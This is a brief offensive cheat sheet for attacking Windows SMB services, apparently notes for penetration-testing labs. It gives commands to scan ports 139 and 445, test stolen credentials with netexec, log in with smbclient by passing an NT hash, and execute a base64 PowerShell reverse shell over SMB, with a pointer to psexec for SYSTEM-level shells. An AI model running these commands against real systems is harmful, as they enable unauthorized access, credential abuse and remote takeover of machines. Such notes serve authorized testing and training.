Using SMBClient

# Check whether the SMB ports (139 and 445) are open on the target.
nmap -p 139,445 $IP

# If a port is open, check whether the username and credential are allowed to log in. If the output shows "pwned", the login is allowed.
# Double quotes are needed so the shell expands $Password (single quotes would pass the literal string).
netexec smb $IP -u $UserName -p "$Password" --continue-on-success

# Normal login with a password (smbclient prompts for it).
smbclient \\\\192.168.50.212\\secrets -U Administrator

# Login using the NT hash instead of the password (note the space before --pw-nt-hash).
smbclient \\\\192.168.50.212\\secrets -U $UserName --pw-nt-hash $NTLMHash

# Getting a stable shell by executing a command over SMB.
netexec smb $IP -u $UserName -p "$Password" -x "$PowershellBase64ReverseShellCode"
# This will not give a shell as "NT System". Use an Impacket tool such as psexec to get an NT System shell.
